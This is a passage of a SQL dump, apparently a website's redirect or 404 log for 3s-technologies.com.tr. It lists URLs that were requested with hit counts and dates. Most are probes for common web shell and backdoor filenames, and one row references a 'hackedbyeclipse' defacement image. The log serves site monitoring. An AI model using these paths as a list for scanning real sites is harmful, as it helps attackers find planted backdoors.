00:00:00',301),(46271,'http://mail.3s-technologies.com.tr/tr/in.php',NULL,'','',22,0,'2025-09-04 11:44:13','0000-00-00 00:00:00',301),(46272,'http://mail.3s-technologies.com.tr/tr/inputs.php',NULL,'','',119,0,'2025-09-04 11:44:14','0000-00-00 00:00:00',301),(46273,'http://mail.3s-technologies.com.tr/tr/lv.php',NULL,'','',67,0,'2025-09-04 11:44:16','0000-00-00 00:00:00',301),(46274,'http://mail.3s-technologies.com.tr/tr/helper.php',NULL,'','',3,0,'2025-09-04 11:44:17','0000-00-00 00:00:00',301),(46275,'http://mail.3s-technologies.com.tr/tr/file32.php',NULL,'','',17,0,'2025-09-04 11:44:18','0000-00-00 00:00:00',301),(46276,'http://mail.3s-technologies.com.tr/tr/config.php',NULL,'','',48,0,'2025-09-04 11:44:19','0000-00-00 00:00:00',301),(46277,'http://mail.3s-technologies.com.tr/tr/bless_250808022320.php',NULL,'','',3,0,'2025-09-04 11:44:20','0000-00-00 00:00:00',301),(46278,'http://mail.3s-technologies.com.tr/tr/axx.php',NULL,'','',30,0,'2025-09-04 11:44:22','0000-00-00 00:00:00',301),(46279,'http://mail.3s-technologies.com.tr/tr/zadad4dadad1.php',NULL,'','',3,0,'2025-09-04 11:44:22','0000-00-00 00:00:00',301),(46280,'http://mail.3s-technologies.com.tr/tr/xlb2nxap.php',NULL,'','',3,0,'2025-09-04 11:44:23','0000-00-00 00:00:00',301),(46281,'http://mail.3s-technologies.com.tr/tr/wsback.php',NULL,'','',4,0,'2025-09-04 11:44:25','0000-00-00 00:00:00',301),(46282,'http://mail.3s-technologies.com.tr/tr/cfile.php',NULL,'','',23,0,'2025-09-04 11:44:26','0000-00-00 00:00:00',301),(46283,'http://mail.3s-technologies.com.tr/tr/wp-trackback.php',NULL,'','',35,0,'2025-09-04 11:44:27','0000-00-00 00:00:00',301),(46284,'http://mail.3s-technologies.com.tr/tr/asasx.php',NULL,'','',28,0,'2025-09-04 11:44:30','0000-00-00 00:00:00',301),(46285,'http://mail.3s-technologies.com.tr/tr/cbgd.php',NULL,'','',3,0,'2025-09-04 11:44:31','0000-00-00 00:00:00',301),(46286,'http://mail.3s-technologies.com.tr/tr/aucxzso.php',NULL,'','',4,0,'2025-09-04 11:44:31','0000-00-00 00:00:00',301),(46287,'http://mail.3s-technologies.com.tr/tr/autoload_classmap.php',NULL,'','',64,0,'2025-09-04 11:44:32','0000-00-00 00:00:00',301),(46288,'http://mail.3s-technologies.com.tr/tr/berax.php',NULL,'','',4,0,'2025-09-04 11:44:33','0000-00-00 00:00:00',301),(46289,'http://mail.3s-technologies.com.tr/tr/cbrfo.php',NULL,'','',6,0,'2025-09-04 11:44:34','0000-00-00 00:00:00',301),(46290,'http://mail.3s-technologies.com.tr/tr/dfre.php',NULL,'','',11,0,'2025-09-04 11:44:35','0000-00-00 00:00:00',301),(46291,'http://mail.3s-technologies.com.tr/tr/disagimons.php',NULL,'','',3,0,'2025-09-04 11:44:35','0000-00-00 00:00:00',301),(46292,'http://mail.3s-technologies.com.tr/tr/disagreop.php',NULL,'','',3,0,'2025-09-04 11:44:36','0000-00-00 00:00:00',301),(46293,'http://mail.3s-technologies.com.tr/tr/manager.php',NULL,'','',54,0,'2025-09-04 11:44:37','0000-00-00 00:00:00',301),(46294,'http://mail.3s-technologies.com.tr/tr/uploan.php',NULL,'','',3,0,'2025-09-04 11:44:38','0000-00-00 00:00:00',301),(46295,'http://3s-technologies.com.tr/tr/schallfuns.php',NULL,'http://3s-technologies.com.tr/schallfuns.php','',17,0,'2025-09-04 14:30:48','0000-00-00 00:00:00',301),(46296,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/hellopress/wp_filemanager.php',NULL,'','',66,0,'2025-09-04 15:38:27','0000-00-00 00:00:00',301),(46297,'http://www.3s-technologies.com.tr/tr/lock360.php',NULL,'','',17,0,'2025-09-04 15:38:28','0000-00-00 00:00:00',301),(46298,'http://www.3s-technologies.com.tr/tr/gmo.php',NULL,'','',17,0,'2025-09-04 15:38:28','0000-00-00 00:00:00',301),(46299,'http://www.3s-technologies.com.tr/tr/ar.php',NULL,'','',8,0,'2025-09-04 15:38:29','0000-00-00 00:00:00',301),(46300,'http://www.3s-technologies.com.tr/tr/we.php',NULL,'','',9,0,'2025-09-04 15:38:29','0000-00-00 00:00:00',301),(46301,'http://www.3s-technologies.com.tr/tr/abcd.php',NULL,'','',15,0,'2025-09-04 15:38:30','0000-00-00 00:00:00',301),(46302,'http://www.3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/filemanager.php',NULL,'','',1,0,'2025-09-04 15:38:31','0000-00-00 00:00:00',301),(46303,'http://www.3s-technologies.com.tr/tr/pp.php',NULL,'','',10,0,'2025-09-04 15:38:31','0000-00-00 00:00:00',301),(46304,'http://www.3s-technologies.com.tr/tr/xc.php',NULL,'','',4,0,'2025-09-04 15:38:32','0000-00-00 00:00:00',301),(46305,'http://www.3s-technologies.com.tr/tr/class20.php',NULL,'','',13,0,'2025-09-04 15:38:33','0000-00-00 00:00:00',301),(46306,'http://www.3s-technologies.com.tr/tr/ol.php',NULL,'','',11,0,'2025-09-04 15:38:34','0000-00-00 00:00:00',301),(46307,'http://www.3s-technologies.com.tr/tr/wp-gr.php',NULL,'','',6,0,'2025-09-04 15:38:34','0000-00-00 00:00:00',301),(46308,'http://www.3s-technologies.com.tr/tr/axx.php',NULL,'','',6,0,'2025-09-04 15:38:36','0000-00-00 00:00:00',301),(46309,'https://3s-technologies.com.tr/tr/_ipx/w1080,q75/https:/astralecorp.com/thee-eclipse/83593a52-2a46-44a2-89e4-04b52495e07f_hackedbyeclipse.png',NULL,'https://3s-technologies.com.tr/_ipx/w1080,q75/https://astralecorp.com%2Fthee-eclipse%2F83593a52-2a46-44a2-89e4-04b52495e07f_hackedbyeclipse.png','',5,0,'2025-09-04 15:50:13','0000-00-00 00:00:00',301),(46310,'http://mail.3s-technologies.com.tr/tr/golden.php',NULL,'','',3,0,'2025-09-04 20:38:42','0000-00-00 00:00:00',301),(46311,'http://mail.3s-technologies.com.tr/tr/wsa.php',NULL,'','',8,0,'2025-09-04 20:38:59','0000-00-00 00:00:00',301),(46312,'http://mail.3s-technologies.com.tr/tr/xmlrpcx.php',NULL,'','',1,0,'2025-09-04 20:39:00','0000-00-00 00:00:00',301),(46313,'http://mail.3s-technologies.com.tr/tr/ad.php',NULL,'','',8,0,'2025-09-04 20:39:03','0000-00-00 00:00:00',301),(46314,'http://mail.3s-technologies.com.tr/tr/acp.php',NULL,'','',48,0,'2025-09-04 20:39:06','0000-00-00 00:00:00',301),(46315,'http://mail.3s-technologies.com.tr/tr/css/index.php',NULL,'','',41,0,'2025-09-04 20:39:08','0000-00-00 00:00:00',301),(46316,'http://mail.3s-technologies.com.tr/tr/past.php',NULL,'','',8,0,'2025-09-04 20:39:09','0000-00-00 00:00:00',301),(46317,'http://mail.3s-technologies.com.tr/tr/wp-mn.php',NULL,'','',6,0,'2025-09-04 20:39:12','0000-00-00 00:00:00',301),(46318,'http://mail.3s-technologies.com.tr/tr/mek.php',NULL,'','',4,0,'2025-09-04 20:39:13','0000-00-00 00:00:00',301),(46319,'http://mail.3s-technologies.com.tr/tr/buy.php',NULL,'','',32,0,'2025-09-04 20:39:16','0000-00-00 00:00:00',301),(46320,'http://mail.3s-technologies.com.tr/tr/pepe.php',NULL,'','',11,0,'2025-09-04 20:39:19','0000-00-00 00:00:00',301),(46321,'http://mail.3s-technologies.com.tr/tr/e.php',NULL,'','',15,0,'2025-09-04 20:39:21','0000-00-00 00:00:00',301),(46322,'http://mail.3s-technologies.com.tr/tr/xleetx.php',NULL,'','',1,0,'2025-09-04 20:39:22','0000-00-00 00:00:00',301),(46323,'http://mail.3s-technologies.com.tr/tr/elp.php',NULL,'','',43,0,'2025-09-04 20:39:23','0000-00-00 00:00:00',301),(46324,'http://mail.3s-technologies.com.tr/tr/xax.php',NULL,'','',1,0,'2025-09-04 20:39:27','0000-00-00 00:00:00',301),(46325,'http://mail.3s-technologies.com.tr/tr/wp-admin/about.php',NULL,'','',26,0,'2025-09-04 20:39:28','0000-00-00 00:00:00',301),(46326,'http://mail.3s-technologies.com.tr/tr/dlex.php',NULL,'','',4,0,'2025-09-04 20:39:31','0000-00-00 00:00:00',301),(46327,'https://3s-technologies.com.tr/en/wp-content/plugins/instabuilder2/cache/up.php',NULL,'www.google.com','',1,0,'2025-09-05 06:33:08','0000-00-00 00:00:00',301),(46328,'https://3s-technologies.com.tr/en/wp-content/themes/pridmag/db.php?u',NULL,'www.google.com','',1,0,'2025-09-05 06:33:13','0000-00-00 00:00:00',301),(46329,'https://3s-technologies.com.tr/en/wp-admin/shell20211028.php',NULL,'www.google.com','',1,0,'2025-09-05 06:33:23','0000-00-00 00:00:00',301),(46330,'http://3s-technologies.com.tr/en/wp-content/plugins/instabuilder2/cache/plugins/moon.php',NULL,'www.google.com','',3,0,'2025-09-05 06:33:28','0000-00-00 00:00:00',301),(46331,'https://3s-technologies.com.tr/en/wp-content/plugins/instabuilder2/cache/plugins/moon.php',NULL,'www.google.com','',1,0,'2025-09-05 06:33:29','0000-00-00 00:00:00',301),(46332,'https://3s-technologies.com.tr/en/wp-content/plugins/ccx/index.php',NULL,'www.google.com','',1,0,'2025-09-05 06:33:37','0000-00-00 00:00:00',301),(46333,'https://3s-technologies.com.tr/en/ccx/index.php',NULL,'www.google.com','',1,0,'2025-09-05 06:33:40','0000-00-00 00:00:00',301),(46334,'https://3s-technologies.com.tr/en/wp-content/themes/ccx/index.php',NULL,'www.google.com','',1,0,'2025-09-05 06:33:42','0000-00-00 00:00:00',301),(46335,'https://3s-technologies.com.tr/en/wp-content/index.php',NULL,'www.google.com','',1,0,'2025-09-05 06:33:46','0000-00-00 00:00:00',301),(46336,'https://3s-technologies.com.tr/en/wp-includes/pomo/newup.php',NULL,'www.google.com','',1,0,'2025-09-05 06:33:52','0000-00-00 00:00:00',301),(46337,'http://3s-technologies.com.tr/en/406.php',NULL,'www.google.com','',1,0,'2025-09-05 06:33:59','0000-00-00 00:00:00',301),(46338,'https://3s-technologies.com.tr/en/406.php',NULL,'www.google.com','',1,0,'2025-09-05 06:34:01','0000-00-00 00:00:00',301),(46339,'http://3s-technologies.com.tr/en/wp-includes/embed-wp.php',NULL,'www.google.com','',1,0,'2025-09-05 06:34:42','0000-00-00 00:00:00',301),(46340,'https://3s-technologies.com.tr/en/wp-includes/embed-wp.php',NULL,'www.google.com','',1,0,'2025-09-05 06:34:43','0000-00-00 00:00:00',301),(46341,'http://3s-technologies.com.tr/en/wp-includes/wso.php',NULL,'www.google.com','',5,0,'2025-09-05 06:35:23','0000-00-00 00:00:00',301),(46342,'https://3s-technologies.com.tr/en/wp-includes/wso.php',NULL,'www.google.com','',1,0,'2025-09-05 06:35:24','0000-00-00 00:00:00',301),(46343,'https://3s-technologies.com.tr/en/wp-admin/includes/logs.php',NULL,'www.google.com','',1,0,'2025-09-05 06:35:27','0000-00-00 00:00:00',301),(46344,'https://3s-technologies.com.tr/en/wp-includes/pomo/treame.php',NULL,'www.google.com','',1,0,'2025-09-05 06:35:29','0000-00-00 00:00:00',301),(46345,'https://3s-technologies.com.tr/en/wp-includes/id3/vp.php',NULL,'www.google.com','',1,0,'2025-09-05 06:35:35','0000-00-00 00:00:00',301),(46346,'https://3s-technologies.com.tr/en/.well-known/pki-validation/atomlib.php',NULL,'www.google.com','',1,0,'2025-09-05 06:35:37','0000-00-00 00:00:00',301),(46347,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/atomlib.php',NULL,'www.google.com','',3,0,'2025-09-05 06:35:39','0000-00-00 00:00:00',301),(46348,'https://3s-technologies.com.tr/en/.well-known/acme-challenge/atomlib.php',NULL,'www.google.com','',1,0,'2025-09-05 06:35:40','0000-00-00 00:00:00',301),(46349,'https://3s-technologies.com.tr/en/wp-includes/widgets/class-wp-widget-index.php',NULL,'www.google.com','',1,0,'2025-09-05 06:35:46','0000-00-00 00:00:00',301),(46350,'https://3s-technologies.com.tr/en/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',NULL,'www.google.com','',1,0,'2025-09-05 06:35:49','0000-00-00 00:00:00',301),(46351,'http://3s-technologies.com.tr/en/wp-content/uploads/wp-logout.php',NULL,'www.google.com','',3,0,'2025-09-05 06:35:57','0000-00-00 00:00:00',301),(46352,'https://3s-technologies.com.tr/en/wp-content/uploads/wp-logout.php',NULL,'www.google.com','',1,0,'2025-09-05 06:35:58','0000-00-00 00:00:00',301),(46353,'https://3s-technologies.com.tr/en/wp-content/themes/sketch/404.php',NULL,'www.google.com','',1,0,'2025-09-05 06:36:01','0000-00-00 00:00:00',301),(46354,'https://3s-technologies.com.tr/en/wp-content/themes/twentyfive/include.php',NULL,'www.google.com','',1,0,'2025-09-05 06:36:05','0000-00-00 00:00:00',301),(46355,'https://3s-technologies.com.tr/en/wp-content/uploads/ac_assets/indosec.php',NULL,'www.google.com','',1,0,'2025-09-05 06:36:09','0000-00-00 00:00:00',301),(46356,'http://3s-technologies.com.tr/en/wp-content/themes/classic/inc/index.php',NULL,'www.google.com','',1,0,'2025-09-05 06:36:10','0000-00-00 00:00:00',301),(46357,'https://3s-technologies.com.tr/en/wp-content/themes/classic/inc/index.php',NULL,'www.google.com','',1,0,'2025-09-05 06:36:11','0000-00-00 00:00:00',301),(46358,'http://3s-technologies.com.tr/en/wp-content/406.php',NULL,'www.google.com','',1,0,'2025-09-05 06:36:16','0000-00-00 00:00:00',301),(46359,'https://3s-technologies.com.tr/en/wp-content/406.php',NULL,'www.google.com','',1,0,'2025-09-05 06:36:17','0000-00-00 00:00:00',301),(46360,'http://3s-technologies.com.tr/en/wp-admin/406.php',NULL,'www.google.com','',1,0,'2025-09-05 06:36:19','0000-00-00 00:00:00',301),(46361,'https://3s-technologies.com.tr/en/wp-admin/406.php',NULL,'www.google.com','',1,0,'2025-09-05 06:36:21','0000-00-00 00:00:00',301),(46362,'https://3s-technologies.com.tr/en/wp-content/plugins/core-stab/index.php',NULL,'www.google.com','',1,0,'2025-09-05 06:36:25','0000-00-00 00:00:00',301),(46363,'https://3s-technologies.com.tr/en/wp-includes/xl2023.php',NULL,'www.google.com','',1,0,'2025-09-05 06:36:41','0000-00-00 00:00:00',301),(46364,'https://3s-technologies.com.tr/en/wp-content/xl2023.php',NULL,'www.google.com','',1,0,'2025-09-05 06:36:43','0000-00-00 00:00:00',301),(46365,'https://3s-technologies.com.tr/en/wp-admin/xl2023.php',NULL,'www.google.com','',1,0,'2025-09-05 06:36:46','0000-00-00 00:00:00',301),(46366,'http://3s-technologies.com.tr/en/wsoyanzorng.php',NULL,'www.google.com','',3,0,'2025-09-05 06:36:48','0000-00-00 00:00:00',301),(46367,'https://3s-technologies.com.tr/en/wsoyanzorng.php',NULL,'www.google.com','',1,0,'2025-09-05 06:36:49','0000-00-00 00:00:00',301),(46368,'http://3s-technologies.com.tr/en/webadmin/about.php',NULL,'www.google.com','',1,0,'2025-09-05 06:36:59','0000-00-00 00:00:00',301),(46369,'https://3s-technologies.com.tr/en/webadmin/about.php',NULL,'www.google.com','',1,0,'2025-09-05 06:37:01','0000-00-00 00:00:00',301),(46370,'https://3s-technologies.com.tr/en/wp-content/themes/mero-magazine/ws.php',NULL,'www.google.com','',1,0,'2025-09-05 06:37:04','0000-00-00 00:00:00',301),(46371,'http://3s-technologies.com.tr/en/wp-admin/images.php',NULL,'www.google.com','',1,0,'2025-09-05 06:37:05','0000-00-00 00:00:00',301),(46372,'https://3s-technologies.com.tr/en/wp-admin/images.php',NULL,'www.google.com','',1,0,'2025-09-05 06:37:07','0000-00-00 00:00:00',301),(46373,'http://3s-technologies.com.tr/en/wp-content/plugins/sid/sidwso.php',NULL,'www.google.com','',6,0,'2025-09-05 06:37:08','0000-00-00 00:00:00',301),(46374,'http://3s-technologies.com.tr/en/locales.php',NULL,'www.google.com','',1,0,'2025-09-05 06:37:11','0000-00-00 00:00:00',301),(46375,'https://3s-technologies.com.tr/en/locales.php',NULL,'www.google.com','',2,0,'2025-09-05 06:37:13','0000-00-00 00:00:00',301),(46376,'http://3s-technologies.com.tr/en/wp-content/xxx/xxx-xxx/xxxx-xx-xx/pages/xxxxxx.php',NULL,'www.google.com','',1,0,'2025-09-05 06:37:14','0000-00-00 00:00:00',301),(46377,'https://3s-technologies.com.tr/en/wp-content/xxx/xxx-xxx/xxxx-xx-xx/pages/xxxxxx.php',NULL,'www.google.com','',1,0,'2025-09-05 06:37:16','0000-00-00 00:00:00',301),(46378,'http://3s-technologies.com.tr/en/wp-includes/atom.php',NULL,'www.google.com','',1,0,'2025-09-05 06:37:17','0000-00-00 00:00:00',301),(46379,'http://3s-technologies.com.tr/en/wp-22.php',NULL,'www.google.com','',3,0,'2025-09-05 06:37:31','0000-00-00 00:00:00',301),(46380,'https://3s-technologies.com.tr/en/wp-22.php',NULL,'www.google.com','',1,0,'2025-09-05 06:37:32','0000-00-00 00:00:00',301),(46381,'http://3s-technologies.com.tr/tr/rsnu.php',NULL,'','',20,0,'2025-09-05 09:22:40','0000-00-00 00:00:00',301),(46382,'http://3s-technologies.com.tr/tr/card.php',NULL,'','',23,0,'2025-09-05 09:22:41','0000-00-00 00:00:00',301),(46383,'http://3s-technologies.com.tr/tr/aa17.php',NULL,'','',15,0,'2025-09-05 09:22:42','0000-00-00 00:00:00',301),(46384,'http://3s-technologies.com.tr/tr/admi.php',NULL,'','',7,0,'2025-09-05 09:22:43','0000-00-00 00:00:00',301),(46385,'http://3s-technologies.com.tr/tr/note.php',NULL,'','',7,0,'2025-09-05 09:22:44','0000-00-00 00:00:00',301),(46386,'http://3s-technologies.com.tr/tr/resp.php',NULL,'','',22,0,'2025-09-05 09:22:47','0000-00-00 00:00:00',301),(46387,'http://3s-technologies.com.tr/tr/algox.php',NULL,'','',7,0,'2025-09-05 09:22:48','0000-00-00 00:00:00',301),(46388,'http://3s-technologies.com.tr/tr/sxb.php',NULL,'','',9,0,'2025-09-05 09:22:50','0000-00-00 00:00:00',301),(46389,'http://3s-technologies.com.tr/tr/gm.php',NULL,'','',73,0,'2025-09-05 09:22:51','0000-00-00 00:00:00',301),(46390,'http://3s-technologies.com.tr/tr/miansha.php',NULL,'','',29,0,'2025-09-05 09:22:54','0000-00-00 00:00:00',301),(46391,'http://3s-technologies.com.tr/tr/mjq.php',NULL,'','',26,0,'2025-09-05 09:22:55','0000-00-00 00:00:00',301),(46392,'http://3s-technologies.com.tr/tr/yanki.php',NULL,'','',17,0,'2025-09-05 09:22:57','0000-00-00 00:00:00',301),(46393,'http://3s-technologies.com.tr/tr/elf.php',NULL,'','',9,0,'2025-09-05 09:22:58','0000-00-00 00:00:00',301),(46394,'http://3s-technologies.com.tr/tr/pola.php',NULL,'','',7,0,'2025-09-05 09:23:01','0000-00-00 00:00:00',301),(46395,'http://3s-technologies.com.tr/tr/mbg.php',NULL,'','',7,0,'2025-09-05 09:23:02','0000-00-00 00:00:00',301),(46396,'http://3s-technologies.com.tr/tr/karak.php',NULL,'','',28,0,'2025-09-05 09:23:04','0000-00-00 00:00:00',301),(46397,'http://3s-technologies.com.tr/tr/loli.php',NULL,'','',7,0,'2025-09-05 09:23:05','0000-00-00 00:00:00',301),(46398,'http://3s-technologies.com.tr/tr/667.php',NULL,'','',16,0,'2025-09-05 09:23:06','0000-00-00 00:00:00',301),(46399,'http://3s-technologies.com.tr/tr/cbgd.php',NULL,'','',3,0,'2025-09-05 09:24:18','0000-00-00 00:00:00',301),(46400,'http://mail.3s-technologies.com.tr/tr/rsnu.php',NULL,'','',10,0,'2025-09-05 12:30:00','0000-00-00 00:00:00',301),(46401,'http://mail.3s-technologies.com.tr/tr/card.php',NULL,'','',16,0,'2025-09-05 12:30:01','0000-00-00 00:00:00',301),(46402,'http://mail.3s-technologies.com.tr/tr/aa17.php',NULL,'','',9,0,'2025-09-05 12:30:02','0000-00-00 00:00:00',301),(46403,'http://mail.3s-technologies.com.tr/tr/admi.php',NULL,'','',5,0,'2025-09-05 12:30:03','0000-00-00 00:00:00',301),(46404,'http://mail.3s-technologies.com.tr/tr/note.php',NULL,'','',5,0,'2025-09-05 12:30:03','0000-00-00 00:00:00',301),(46405,'http://mail.3s-technologies.com.tr/tr/png.php',NULL,'','',20,0,'2025-09-05 12:30:04','0000-00-00 00:00:00',301),(46406,'http://mail.3s-technologies.com.tr/tr/ava.php',NULL,'','',28,0,'2025-09-05 12:30:05','0000-00-00 00:00:00',301),(46407,'http://mail.3s-technologies.com.tr/tr/resp.php',NULL,'','',15,0,'2025-09-05 12:30:06','0000-00-00 00:00:00',301),(46408,'http://mail.3s-technologies.com.tr/tr/algox.php',NULL,'','',5,0,'2025-09-05 12:30:07','0000-00-00 00:00:00',301),(46409,'http://mail.3s-technologies.com.tr/tr/v2.php',NULL,'','',35,0,'2025-09-05 12:30:07','0000-00-00 00:00:00',301),(46410,'http://mail.3s-technologies.com.tr/tr/hb02ugyh.php',NULL,'','',5,0,'2025-09-05 12:30:08','0000-00-00 00:00:00',301),(46411,'http://mail.3s-technologies.com.tr/tr/sxb.php',NULL,'','',6,0,'2025-09-05 12:30:09','0000-00-00 00:00:00',301),(46412,'http://mail.3s-technologies.com.tr/tr/gm.php',NULL,'','',28,0,'2025-09-05 12:30:10','0000-00-00 00:00:00',301),(46413,'http://mail.3s-technologies.com.tr/tr/jga.php',NULL,'','',46,0,'2025-09-05 12:30:11','0000-00-00 00:00:00',301),(46414,'http://mail.3s-technologies.com.tr/tr/miansha.php',NULL,'','',17,0,'2025-09-05 12:30:12','0000-00-00 00:00:00',301),(46415,'http://mail.3s-technologies.com.tr/tr/mjq.php',NULL,'','',9,0,'2025-09-05 12:30:13','0000-00-00 00:00:00',301),(46416,'http://mail.3s-technologies.com.tr/tr/yasnu.php',NULL,'','',15,0,'2025-09-05 12:30:14','0000-00-00 00:00:00',301),(46417,'http://mail.3s-technologies.com.tr/tr/yanki.php',NULL,'','',9,0,'2025-09-05 12:30:15','0000-00-00 00:00:00',301),(46418,'http://mail.3s-technologies.com.tr/tr/elf.php',NULL,'','',5,0,'2025-09-05 12:30:16','0000-00-00 00:00:00',301),(46419,'http://mail.3s-technologies.com.tr/tr/pola.php',NULL,'','',5,0,'2025-09-05 12:30:18','0000-00-00 00:00:00',301),(46420,'http://mail.3s-technologies.com.tr/tr/mbg.php',NULL,'','',5,0,'2025-09-05 12:30:19','0000-00-00 00:00:00',301),(46421,'http://mail.3s-technologies.com.tr/tr/karak.php',NULL,'','',8,0,'2025-09-05 12:30:21','0000-00-00 00:00:00',301),(46422,'http://mail.3s-technologies.com.tr/tr/loli.php',NULL,'','',5,0,'2025-09-05 12:30:22','0000-00-00 00:00:00',301),(46423,'http://mail.3s-technologies.com.tr/tr/667.php',NULL,'','',8,0,'2025-09-05 12:30:23','0000-00-00 00:00:00',301),(46424,'http://mail.3s-technologies.com.tr/tr/.lajuju.php',NULL,'','',5,0,'2025-09-05 12:30:34','0000-00-00 00:00:00',301),(46425,'http://mail.3s-technologies.com.tr/tr/aucxcocoxo.php',NULL,'','',3,0,'2025-09-05 12:31:15','0000-00-00 00:00:00',301),(46426,'https://www.3s-technologies.com.tr/tr/kart-ueretim-teknolojileri\n',NULL,'','',1,0,'2025-09-05 23:25:54','0000-00-00 00:00:00',301),(46427,'https://3s-technologies.com.tr/tr/ürünler\n',NULL,'','',1,0,'2025-09-06 08:26:19','0000-00-00 00:00:00',301),(46428,'https://www.3s-technologies.com.tr/tr/video\n',NULL,'','',2,0,'2025-09-06 11:15:23','0000-00-00 00:00:00',301),(46429,'http://3s-technologies.com.tr/tr/bv3.php',NULL,'','',5,0,'2025-09-06 11:39:53','0000-00-00 00:00:00',301),(46430,'https://www.3s-technologies.com.tr/tr/pcb-prototip-prototyping\n',NULL,'','',1,0,'2025-09-06 15:36:03','0000-00-00 00:00:00',301),(46431,'http://mail.3s-technologies.com.tr/tr/bu10r7.php',NULL,'','',1,0,'2025-09-06 17:44:51','0000-00-00 00:00:00',301),(46432,'http://mail.3s-technologies.com.tr/tr/huda.php',NULL,'','',1,0,'2025-09-06 17:44:51','0000-00-00 00:00:00',301),(46433,'http://mail.3s-technologies.com.tr/tr/hkn.php',NULL,'','',1,0,'2025-09-06 17:44:52','0000-00-00 00:00:00',301),(46434,'http://mail.3s-technologies.com.tr/tr/sdsd777.php',NULL,'','',1,0,'2025-09-06 17:44:53','0000-00-00 00:00:00',301),(46435,'http://mail.3s-technologies.com.tr/tr/ioxi2.php',NULL,'','',10,0,'2025-09-06 17:44:56','0000-00-00 00:00:00',301),(46436,'http://mail.3s-technologies.com.tr/tr/h.php',NULL,'','',29,0,'2025-09-06 17:44:57','0000-00-00 00:00:00',301),(46437,'http://mail.3s-technologies.com.tr/tr/zcxb.php',NULL,'','',3,0,'2025-09-06 17:44:58','0000-00-00 00:00:00',301),(46438,'http://mail.3s-technologies.com.tr/tr/wpls.php',NULL,'','',13,0,'2025-09-06 17:44:58','0000-00-00 00:00:00',301),(46439,'http://mail.3s-technologies.com.tr/tr/testas.php',NULL,'','',3,0,'2025-09-06 17:44:59','0000-00-00 00:00:00',301),(46440,'http://mail.3s-technologies.com.tr/tr/nope.php',NULL,'','',11,0,'2025-09-06 17:44:59','0000-00-00 00:00:00',301),(46441,'http://mail.3s-technologies.com.tr/tr/reyna.php',NULL,'','',3,0,'2025-09-06 17:45:00','0000-00-00 00:00:00',301),(46442,'http://mail.3s-technologies.com.tr/tr/ma1.php',NULL,'','',3,0,'2025-09-06 17:45:00','0000-00-00 00:00:00',301),(46443,'http://mail.3s-technologies.com.tr/tr/bypltspd.php',NULL,'','',5,0,'2025-09-06 17:45:01','0000-00-00 00:00:00',301),(46444,'http://mail.3s-technologies.com.tr/tr/aaa.php',NULL,'','',43,0,'2025-09-06 17:45:02','0000-00-00 00:00:00',301),(46445,'http://mail.3s-technologies.com.tr/tr/wp-xx.php',NULL,'','',3,0,'2025-09-06 17:45:02','0000-00-00 00:00:00',301),(46446,'http://mail.3s-technologies.com.tr/tr/wp-xm.php',NULL,'','',3,0,'2025-09-06 17:45:03','0000-00-00 00:00:00',301),(46447,'http://mail.3s-technologies.com.tr/tr/zeal.php',NULL,'','',7,0,'2025-09-06 17:45:03','0000-00-00 00:00:00',301),(46448,'http://mail.3s-technologies.com.tr/tr/h8h9.php',NULL,'','',3,0,'2025-09-06 17:45:04','0000-00-00 00:00:00',301),(46449,'http://mail.3s-technologies.com.tr/tr/zasd.php',NULL,'','',3,0,'2025-09-06 17:45:04','0000-00-00 00:00:00',301),(46450,'http://mail.3s-technologies.com.tr/tr/xzs.php',NULL,'','',3,0,'2025-09-06 17:45:05','0000-00-00 00:00:00',301),(46451,'http://mail.3s-technologies.com.tr/tr/yep.php',NULL,'','',4,0,'2025-09-06 17:45:05','0000-00-00 00:00:00',301),(46452,'http://mail.3s-technologies.com.tr/tr/des.php',NULL,'','',19,0,'2025-09-06 17:45:06','0000-00-00 00:00:00',301),(46453,'http://mail.3s-technologies.com.tr/tr/xex.php',NULL,'','',11,0,'2025-09-06 17:45:07','0000-00-00 00:00:00',301),(46454,'http://mail.3s-technologies.com.tr/tr/tox.php',NULL,'','',16,0,'2025-09-06 17:45:07','0000-00-00 00:00:00',301),(46455,'http://mail.3s-technologies.com.tr/tr/racs3.php',NULL,'','',8,0,'2025-09-06 17:45:08','0000-00-00 00:00:00',301),(46456,'http://mail.3s-technologies.com.tr/tr/wp-cliner.php',NULL,'','',3,0,'2025-09-06 17:45:08','0000-00-00 00:00:00',301),(46457,'http://mail.3s-technologies.com.tr/tr/moo.php',NULL,'','',5,0,'2025-09-06 17:45:09','0000-00-00 00:00:00',301),(46458,'http://mail.3s-technologies.com.tr/tr/noe.php',NULL,'','',8,0,'2025-09-06 17:45:11','0000-00-00 00:00:00',301),(46459,'http://mail.3s-technologies.com.tr/tr/fe5.php',NULL,'','',48,0,'2025-09-06 17:45:11','0000-00-00 00:00:00',301),(46460,'http://mail.3s-technologies.com.tr/tr/gg.php',NULL,'','',41,0,'2025-09-06 17:45:12','0000-00-00 00:00:00',301),(46461,'http://mail.3s-technologies.com.tr/tr/fresh3.php',NULL,'','',7,0,'2025-09-06 17:45:12','0000-00-00 00:00:00',301),(46462,'http://mail.3s-technologies.com.tr/tr/mo.php',NULL,'','',13,0,'2025-09-06 17:45:13','0000-00-00 00:00:00',301),(46463,'http://3s-technologies.com.tr/tr/wp-admins.php',NULL,'','',6,0,'2025-09-06 19:49:23','0000-00-00 00:00:00',301),(46464,'http://3s-technologies.com.tr/tr/wp-admin/maint/about.php7',NULL,'','',2,0,'2025-09-06 20:38:43','0000-00-00 00:00:00',301),(46465,'http://3s-technologies.com.tr/tr/jlc14ng3.php',NULL,'','',2,0,'2025-09-06 20:38:48','0000-00-00 00:00:00',301),(46466,'http://3s-technologies.com.tr/tr/uhddppix.php',NULL,'','',1,0,'2025-09-06 20:38:57','0000-00-00 00:00:00',301),(46467,'http://3s-technologies.com.tr/tr/qwturjyu.php',NULL,'','',1,0,'2025-09-06 20:38:58','0000-00-00 00:00:00',301),(46468,'http://3s-technologies.com.tr/tr/gqksqsxc.php',NULL,'','',1,0,'2025-09-06 20:38:59','0000-00-00 00:00:00',301),(46469,'http://3s-technologies.com.tr/tr/admin836.php',NULL,'','',5,0,'2025-09-06 20:39:08','0000-00-00 00:00:00',301),(46470,'http://3s-technologies.com.tr/tr/i3zu2h.php',NULL,'','',1,0,'2025-09-06 20:39:10','0000-00-00 00:00:00',301),(46471,'http://3s-technologies.com.tr/tr/pu1.php',NULL,'','',1,0,'2025-09-06 20:39:11','0000-00-00 